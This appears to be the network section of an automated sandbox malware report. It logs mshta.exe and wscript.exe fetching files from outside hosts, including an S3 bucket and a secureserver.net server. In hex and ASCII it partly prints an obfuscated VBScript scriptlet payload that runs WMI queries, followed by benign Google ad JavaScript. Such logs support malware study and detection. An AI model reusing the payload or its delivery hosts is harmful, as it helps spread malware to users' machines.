                                                                                                                                                                                                                                      x-amz-meta-s3cmd-attrs: uid:502/gname:staff/uname:user/gid:20/mode:33188/mtime:1493416832/atime:1493796970/md5:d41d8cd98f00b204e9800998ecf8427e/ctime:1493416832
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      2192.168.2.24498383.5.232.1304433360C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-23 09:41:25 UTC371OUTGET /image.jpeg?x-cm=lasa&x-ref= HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Language: en-CH,en-US;q=0.7,en;q=0.3
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                      Host: logs-referer.s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      2024-12-23 09:41:25 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      x-amz-id-2: MugwWIsJ417Zjn3iNxUtA6tLMNNOyV6n+tZxc5HWIoHnSoiKvUISC66qMmLbTPNPlRAzjJuh67Hj77gdyHKcuw==
                                                                                                                                                                                                                                      x-amz-request-id: 8D2BA1HXV5CZHA39
                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 09:41:26 GMT
                                                                                                                                                                                                                                      Last-Modified: Mon, 10 May 2021 15:23:45 GMT
                                                                                                                                                                                                                                      ETag: "2e85899818427b96f57db55dd05d06a7"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                      Content-Length: 285
                                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-12-23 09:41:25 UTC285INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 72 4f 56 64 56 47 72 64 5d 64 81 79 72 88 ab ff ba ab 9d 9d ab ff fa ff cf ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff db 00 43 01 79 81 81 ab 96 ab ff ba ba ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c0 00 11 08 00 01 00 01 03 01 22 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: JFIFCrOVdVGrd]dyrCy"


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      3192.168.2.244984092.205.57.1024437300C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-23 09:41:25 UTC298OUTGET //g1 HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                      Host: 102.57.205.92.host.secureserver.net
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      2024-12-23 09:41:26 UTC247INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 09:41:26 GMT
                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                      Location: https://102.57.205.92.host.secureserver.net/g1/
                                                                                                                                                                                                                                      Content-Length: 357
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                      2024-12-23 09:41:26 UTC357INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 31 30 32 2e 35 37 2e 32 30 35 2e 39 32 2e 68 6f 73 74 2e 73 65 63 75 72 65 73 65 72 76 65 72 2e 6e 65 74 2f 67 31 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://102.57.205.92.host.secureserver.net/g1/">here</a>.</p><hr><address>A


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      4192.168.2.244984392.205.57.1024437300C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-23 09:41:27 UTC298OUTGET /g1/ HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                      Host: 102.57.205.92.host.secureserver.net
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      2024-12-23 09:41:28 UTC199INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 09:41:28 GMT
                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Content-Type: text/plain;;charset=UTF-8
                                                                                                                                                                                                                                      2024-12-23 09:41:28 UTC6INData Raw: 36 32 34 65 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 624e
                                                                                                                                                                                                                                      2024-12-23 09:41:28 UTC16384INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 0d 0a 3c 63 6f 6d 70 6f 6e 65 6e 74 20 69 64 3d 22 63 6f 6d 70 6f 6e 65 6e 74 32 22 3e 0d 0a 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0d 0a 3c 21 5b 43 44 41 54 41 5b 0d 0a 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 64 65 73 4c 31 56 7a 6c 43 65 33 5f 31 37 28 73 4a 41 56 58 4a 6f 4b 32 52 38 71 79 6b 44 6e 6b 47 5f 32 36 2c 20 75 75 4b 6c 58 59 35 4d 51 5f 31 29 0d 0a 44 69 6d 20 62 62 6f 52 44 6b 35 33 69 70 59 55 4d 5f 32 37 2c 20 43 6d 63 4e 6b 50 6b 56 63 79 73 30 35 72 75 33 5f 32 38 0d 0a 62 62 6f 52 44 6b 35 33 69 70 59 55 4d 5f 32 37 20 3d 20 61 73 63 28 4d 69 64 28 73 4a 41 56 58
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><component id="component2"><script language="VBScript"><![CDATA[function desL1VzlCe3_17(sJAVXJoK2R8qykDnkG_26, uuKlXY5MQ_1)Dim bboRDk53ipYUM_27, CmcNkPkVcys05ru3_28bboRDk53ipYUM_27 = asc(Mid(sJAVX
                                                                                                                                                                                                                                      2024-12-23 09:41:28 UTC8782INData Raw: 74 69 6f 6e 0d 0a 0d 0a 27 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 44 69 6d 20 72 45 74 54 52 4c 6d 66 5f 35 34 2c 20 4f 6f 45 58 51 39 7a 50 72 77 37 5f 35 35 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 53 65 74 20 4e 58 31 37 57 4e 32 6e 72 69 73 32 41 6a 4e 5f 35 36 20 3d 20 47 65 74 4f 62 6a 65 63 74 28 79 6a 6d 54 4f 6d 52 5f 31 32 29 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 53 65 74 20 58 48 44 39 79 6a 70 31 67 59 6e 54 4d 62 35 4c 5f 35 37 20 3d 20 4e 58 31 37 57 4e 32 6e 72 69 73 32 41 6a 4e 5f 35 36 2e 45 78 65 63 51 75 65 72 79 28 6e 6c 43 49 41 35 6d 45 6f 4f 52 6e 31 41 5f 31 33 29 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: tion'////////////////////////////////////////////////////Dim rEtTRLmf_54, OoEXQ9zPrw7_55Set NX17WN2nris2AjN_56 = GetObject(yjmTOmR_12)Set XHD9yjp1gYnTMb5L_57 = NX17WN2nris2AjN_56.ExecQuery(nlCIA5mEoORn1A_13)
                                                                                                                                                                                                                                      2024-12-23 09:41:28 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                      2024-12-23 09:41:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      5192.168.2.2449847172.217.19.1944433360C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-23 09:41:31 UTC385OUTGET /pagead/managed/js/gpt/m202412090101/pubads_impl.js HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Language: en-CH,en-US;q=0.7,en;q=0.3
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                      Host: securepubads.g.doubleclick.net
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      2024-12-23 09:41:32 UTC741INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                      Server: cafe
                                                                                                                                                                                                                                      Content-Length: 503867
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      Date: Sun, 22 Dec 2024 15:29:29 GMT
                                                                                                                                                                                                                                      Expires: Mon, 22 Dec 2025 15:29:29 GMT
                                                                                                                                                                                                                                      Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                      ETag: 5395541545685299795
                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Age: 65522
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-12-23 09:41:32 UTC649INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 2f 2a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 35 2d 32 30 31 38 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 2e 2c 20 4e 65 74 66 6c 69 78 2c 20 49 6e 63 2e 2c 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 2e 20 61 6e 64 20
                                                                                                                                                                                                                                      Data Ascii: (function(_){/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ /* Copyright Google LLC SPDX-License-Identifier: Apache-2.0 */ /* Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and
                                                                                                                                                                                                                                      2024-12-23 09:41:32 UTC1390INData Raw: 53 20 4f 52 20 43 4f 4e 44 49 54 49 4f 4e 53 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 20 65 69 74 68 65 72 20 65 78 70 72 65 73 73 20 6f 72 20 69 6d 70 6c 69 65 64 2e 20 0a 20 53 65 65 20 74 68 65 20 4c 69 63 65 6e 73 65 20 66 6f 72 20 74 68 65 20 73 70 65 63 69 66 69 63 20 6c 61 6e 67 75 61 67 65 20 67 6f 76 65 72 6e 69 6e 67 20 70 65 72 6d 69 73 73 69 6f 6e 73 20 61 6e 64 20 0a 20 6c 69 6d 69 74 61 74 69 6f 6e 73 20 75 6e 64 65 72 20 74 68 65 20 4c 69 63 65 6e 73 65 2e 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 4d 61 74 68 2e 75 75 69 64 2e 6a 73 20 28 76 31 2e 34 29 20 0a 68 74 74 70 3a 2f 2f 77 77 77 2e 62 72 6f 6f 66 61 2e 63 6f 6d 20 0a 6d 61 69 6c 74 6f 3a 72 6f 62 65 72 74 40 62 72 6f 6f 66 61 2e 63 6f 6d 20 0a 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32
                                                                                                                                                                                                                                      Data Ascii: S OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ /* Math.uuid.js (v1.4) http://www.broofa.com mailto:robert@broofa.com Copyright (c) 2
                                                                                                                                                                                                                                      2024-12-23 09:41:32 UTC1390INData Raw: 6f 2c 6d 6f 2c 77 6f 2c 6e 6f 2c 79 6f 2c 7a 6f 2c 44 6f 2c 45 6f 2c 48 6f 2c 49 6f 2c 4a 6f 2c 4c 6f 2c 52 6f 2c 54 6f 2c 58 6f 2c 59 6f 2c 63 70 2c 65 70 2c 66 70 2c 68 70 2c 69 70 2c 6e 70 2c 6f 70 2c 70 70 2c 74 70 2c 6d 70 2c 76 70 2c 77 70 2c 78 70 2c 7a 70 2c 43 70 2c 45 70 2c 46 70 2c 47 70 2c 48 70 2c 4a 70 2c 4c 70 2c 4d 70 2c 4f 70 2c 50 70 2c 51 70 2c 52 70 2c 53 70 2c 54 70 2c 58 70 2c 59 70 2c 62 71 2c 64 71 2c 63 71 2c 68 71 2c 69 71 2c 6a 71 2c 6e 71 2c 6f 71 2c 71 71 2c 70 71 2c 73 71 2c 75 71 2c 77 71 2c 46 71 2c 48 71 2c 4d 71 2c 50 71 2c 51 71 2c 5a 71 2c 62 72 2c 24 71 2c 61 72 2c 69 72 2c 6a 72 2c 73 72 2c 77 72 2c 79 72 2c 41 72 2c 44 72 2c 43 72 2c 42 72 2c 50 72 2c 53 72 2c 5a 72 2c 24 72 2c 69 73 2c 6a 73 2c 6c 73 2c 6d 73 2c 6f
                                                                                                                                                                                                                                      Data Ascii: o,mo,wo,no,yo,zo,Do,Eo,Ho,Io,Jo,Lo,Ro,To,Xo,Yo,cp,ep,fp,hp,ip,np,op,pp,tp,mp,vp,wp,xp,zp,Cp,Ep,Fp,Gp,Hp,Jp,Lp,Mp,Op,Pp,Qp,Rp,Sp,Tp,Xp,Yp,bq,dq,cq,hq,iq,jq,nq,oq,qq,pq,sq,uq,wq,Fq,Hq,Mq,Pq,Qq,Zq,br,$q,ar,ir,jr,sr,wr,yr,Ar,Dr,Cr,Br,Pr,Sr,Zr,$r,is,js,ls,ms,o
                                                                                                                                                                                                                                      2024-12-23 09:41:32 UTC1390INData Raw: 28 22 53 61 66 61 72 69 22 29 26 26 21 28 5f 2e 74 61 28 29 7c 7c 28 5f 2e 6e 61 28 29 3f 30 3a 5f 2e 6d 61 28 22 43 6f 61 73 74 22 29 29 7c 7c 5f 2e 70 61 28 29 7c 7c 28 5f 2e 6e 61 28 29 3f 30 3a 5f 2e 6d 61 28 22 45 64 67 65 22 29 29 7c 7c 28 5f 2e 6e 61 28 29 3f 6a 61 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 5f 2e 6d 61 28 22 45 64 67 2f 22 29 29 7c 7c 28 5f 2e 6e 61 28 29 3f 6a 61 28 22 4f 70 65 72 61 22 29 3a 5f 2e 6d 61 28 22 4f 50 52 22 29 29 7c 7c 5f 2e 73 61 28 29 7c 7c 5f 2e 6d 61 28 22 53 69 6c 6b 22 29 7c 7c 5f 2e 6d 61 28 22 41 6e 64 72 6f 69 64 22 29 29 7d 3b 5f 2e 74 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 6e 61 28 29 3f 6a 61 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 5f 2e 6d 61 28 22 43 68 72 6f
                                                                                                                                                                                                                                      Data Ascii: ("Safari")&&!(_.ta()||(_.na()?0:_.ma("Coast"))||_.pa()||(_.na()?0:_.ma("Edge"))||(_.na()?ja("Microsoft Edge"):_.ma("Edg/"))||(_.na()?ja("Opera"):_.ma("OPR"))||_.sa()||_.ma("Silk")||_.ma("Android"))};_.ta=function(){return _.na()?ja("Chromium"):(_.ma("Chro
                                                                                                                                                                                                                                      2024-12-23 09:41:32 UTC1390INData Raw: 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 62 2c 22 73 63 72 69 70 74 5b 6e 6f 6e 63 65 5d 22 29 3b 28 62 3d 63 3d 3d 6e 75 6c 6c 3f 22 22 3a 63 2e 6e 6f 6e 63 65 7c 7c 63 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 29 7c 7c 22 22 29 26 26 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 2c 62 29 7d 3b 52 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 73 72 63 3d 5f 2e 41 61 28 62 29 3b 51 61 28 61 29 7d 3b 5f 2e 55 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 53 61 29 72 65 74 75 72 6e 20 61 2e 67 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 22 29 3b 7d 3b 56 61 3d 66 75 6e 63 74 69 6f 6e 28 61
                                                                                                                                                                                                                                      Data Ascii: c).querySelector)==null?void 0:d.call(b,"script[nonce]");(b=c==null?"":c.nonce||c.getAttribute("nonce")||"")&&a.setAttribute("nonce",b)};Ra=function(a,b){a.src=_.Aa(b);Qa(a)};_.Ua=function(a){if(a instanceof _.Sa)return a.g;throw Error("");};Va=function(a
                                                                                                                                                                                                                                      2024-12-23 09:41:32 UTC1390INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 7d 3b 6b 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 7b 7d 2c 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 61 5b 64 5d 2c 66 3d 62 2e 63 61 6c 6c 28 76 6f 69 64 20 30 2c 65 2c 64 2c 61 29 3b 66 21 3d 3d 76 6f 69 64 20 30 26 26 28 63 5b 66 5d 7c 7c 28 63 5b 66 5d 3d 5b 5d 29 29 2e 70 75 73 68 28 65 29 7d 72 65 74 75 72 6e 20 63 7d 3b 6c 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 5b 5d 2c 63 3d 30 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 64 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 64 29
                                                                                                                                                                                                                                      Data Ascii: =function(a,b){return a===b};kb=function(a,b){for(var c={},d=0;d<a.length;d++){var e=a[d],f=b.call(void 0,e,d,a);f!==void 0&&(c[f]||(c[f]=[])).push(e)}return c};lb=function(a){for(var b=[],c=0;c<arguments.length;c++){var d=arguments[c];if(Array.isArray(d)
                                                                                                                                                                                                                                      2024-12-23 09:41:32 UTC1390INData Raw: 3e 31 32 26 36 33 7c 31 32 38 3b 64 5b 63 2b 2b 5d 3d 66 3e 3e 36 26 36 33 7c 31 32 38 3b 64 5b 63 2b 2b 5d 3d 66 26 36 33 7c 31 32 38 3b 63 6f 6e 74 69 6e 75 65 7d 65 6c 73 65 20 65 2d 2d 7d 69 66 28 62 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 46 6f 75 6e 64 20 61 6e 20 75 6e 70 61 69 72 65 64 20 73 75 72 72 6f 67 61 74 65 22 29 3b 66 3d 36 35 35 33 33 7d 64 5b 63 2b 2b 5d 3d 66 3e 3e 31 32 7c 32 32 34 3b 64 5b 63 2b 2b 5d 3d 66 3e 3e 36 26 36 33 7c 31 32 38 7d 64 5b 63 2b 2b 5d 3d 66 26 36 33 7c 31 32 38 7d 7d 61 3d 63 3d 3d 3d 64 2e 6c 65 6e 67 74 68 3f 64 3a 64 2e 73 75 62 61 72 72 61 79 28 30 2c 63 29 7d 72 65 74 75 72 6e 20 61 7d 3b 73 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 64 61 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                      Data Ascii: >12&63|128;d[c++]=f>>6&63|128;d[c++]=f&63|128;continue}else e--}if(b)throw Error("Found an unpaired surrogate");f=65533}d[c++]=f>>12|224;d[c++]=f>>6&63|128}d[c++]=f&63|128}}a=c===d.length?d:d.subarray(0,c)}return a};sb=function(a){_.da.setTimeout(function
                                                                                                                                                                                                                                      2024-12-23 09:41:32 UTC1390INData Raw: 72 6e 20 61 21 3d 3d 6e 75 6c 6c 26 26 74 79 70 65 6f 66 20 61 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 4f 62 6a 65 63 74 7d 3b 59 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 21 3d 6e 75 6c 6c 29 69 66 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 29 61 3d 61 3f 6e 65 77 20 57 62 28 61 2c 42 62 29 3a 58 62 28 29 3b 65 6c 73 65 20 69 66 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 21 3d 3d 57 62 29 69 66 28 41 62 28 61 29 29 61 3d 61 2e 6c 65 6e 67 74 68 3f 6e 65 77 20 57 62 28 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 61 29 2c 42 62 29 3a 58 62 28 29 3b 65 6c 73 65 7b 69 66 28 21 62 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29
                                                                                                                                                                                                                                      Data Ascii: rn a!==null&&typeof a==="object"&&!Array.isArray(a)&&a.constructor===Object};Yb=function(a,b){if(a!=null)if(typeof a==="string")a=a?new Wb(a,Bb):Xb();else if(a.constructor!==Wb)if(Ab(a))a=a.length?new Wb(new Uint8Array(a),Bb):Xb();else{if(!b)throw Error()
                                                                                                                                                                                                                                      2024-12-23 09:41:32 UTC1390INData Raw: 2a 28 3f 3a 2d 3f 5b 31 2d 39 5d 5c 64 2a 7c 30 29 3f 5c 73 2a 24 2f 2e 74 65 73 74 28 62 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 62 29 29 3b 7d 65 6c 73 65 20 69 66 28 73 63 28 62 29 26 26 21 5f 2e 77 28 4e 75 6d 62 65 72 2c 22 69 73 53 61 66 65 49 6e 74 65 67 65 72 22 29 2e 63 61 6c 6c 28 4e 75 6d 62 65 72 2c 62 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 62 29 29 3b 72 65 74 75 72 6e 20 74 63 3f 42 69 67 49 6e 74 28 61 29 3a 61 3d 75 63 28 61 29 3f 61 3f 22 31 22 3a 22 30 22 3a 71 63 28 61 29 3f 61 2e 74 72 69 6d 28 29 7c 7c 22 30 22 3a 53 74 72 69 6e 67 28 61 29 7d 3b 77 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3e 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 69
                                                                                                                                                                                                                                      Data Ascii: *(?:-?[1-9]\d*|0)?\s*$/.test(b))throw Error(String(b));}else if(sc(b)&&!_.w(Number,"isSafeInteger").call(Number,b))throw Error(String(b));return tc?BigInt(a):a=uc(a)?a?"1":"0":qc(a)?a.trim()||"0":String(a)};wc=function(a,b){if(a.length>b.length)return!1;i
